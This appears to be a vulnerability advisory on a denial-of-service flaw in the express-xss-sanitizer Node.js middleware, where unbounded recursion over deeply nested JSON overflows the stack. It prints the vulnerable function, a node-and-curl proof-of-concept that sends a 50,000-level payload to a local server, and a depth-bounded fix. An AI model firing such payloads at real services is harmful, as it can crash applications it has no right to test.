The vulnerability exists in the `sanitize` function within `lib/sanitize.js` of the express-xss-sanitizer middleware. This function recursively traverses user-supplied objects to remove potential XSS payloads, but the recursion has no depth limit. When the middleware processes a request containing a JSON object with extremely deep nesting (e.g., `{"a": {"a": {"a": ...}}}` repeated thousands of times), each level of nesting triggers another recursive call to `sanitize`. With no base case on depth, this recursion consumes the call stack; because Node.js has a finite call stack size, the result is a stack overflow error that abruptly terminates the application process and causes a denial-of-service condition.
Platform: Node.js/Express.js
Version: <2.0.1
Vulnerability: Unbounded Recursion
Severity: Moderate
Date: 2025-09-26
Prediction: Patch available (v2.0.1)
What Undercode Say:
Simulating a deeply nested object for testing:
node -e "let obj = {}; let current = obj; for(let i=0; i<50000; i++) { current.a = {}; current = current.a; }; console.log(JSON.stringify(obj))" > payload.json
curl -X POST -H "Content-Type: application/json" -d @payload.json http://localhost:3000/submit-form
// Code snippet from vulnerable version (lib/sanitize.js)
function sanitize(obj) {
    if (typeof obj === 'object') {
        for (let key in obj) {
            obj[key] = sanitize(obj[key]); // Unbounded recursion: descends without any depth check
        }
    }
    // ... sanitization logic
    return obj;
}
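For comparison, here is an added example (not the express-xss-sanitizer project's code) of the same object walk with a depth bound: over-deep input is rejected with a 400-style error long before the call stack is exhausted. The MAX_DEPTH value, the cleanString placeholder and the payload builder are assumptions for illustration.

```javascript
// Added example, not the middleware's own code. Depth-bounded variant of the
// recursive sanitizer: refuses pathological nesting instead of recursing into it.
const MAX_DEPTH = 50; // assumed limit; set it above the depth of legitimate payloads

// Placeholder for the per-string cleaning the real middleware performs; here it
// only escapes angle brackets so the example stays self-contained.
function cleanString(s) {
  return s.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Returns a sanitized copy of `value`; throws an error carrying status 400 when
// nesting exceeds MAX_DEPTH, so the request fails instead of the process.
function sanitizeBounded(value, depth = 0) {
  if (depth > MAX_DEPTH) {
    const err = new Error('payload nesting exceeds ' + MAX_DEPTH);
    err.status = 400;
    throw err;
  }
  if (typeof value === 'string') return cleanString(value);
  if (Array.isArray(value)) return value.map(v => sanitizeBounded(v, depth + 1));
  if (value !== null && typeof value === 'object') {
    const out = {};
    for (const key of Object.keys(value)) {
      out[key] = sanitizeBounded(value[key], depth + 1);
    }
    return out;
  }
  return value; // numbers, booleans, null and undefined pass through unchanged
}

// Constructed payloads: `levels` nested {"a": ...} objects ending in a string,
// built iteratively so construction itself never recurses.
function buildNested(levels) {
  const root = {};
  let cur = root;
  for (let i = 0; i < levels; i++) { cur.a = {}; cur = cur.a; }
  cur.a = '<script>alert(1)</script>';
  return root;
}

// Express-style wiring (Express is not needed to run this file):
// app.use((req, res, next) => { try { req.body = sanitizeBounded(req.body); next(); } catch (e) { next(e); } });
function demo() {
  const ok = sanitizeBounded(buildNested(5));          // legitimate depth: sanitized copy
  let rejected = false;
  try { sanitizeBounded(buildNested(100000)); }        // pathological depth: rejected, no stack overflow
  catch (e) { rejected = e.status === 400; }
  return { ok, rejected };
}
```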
How to Exploit:
Craft a deeply nested JSON payload and send it via POST request.
Protection from this CVE:
Upgrade to version 2.0.1.
Impact:
Denial-of-Service (Application Crash)
Sources:
Reported By: github.com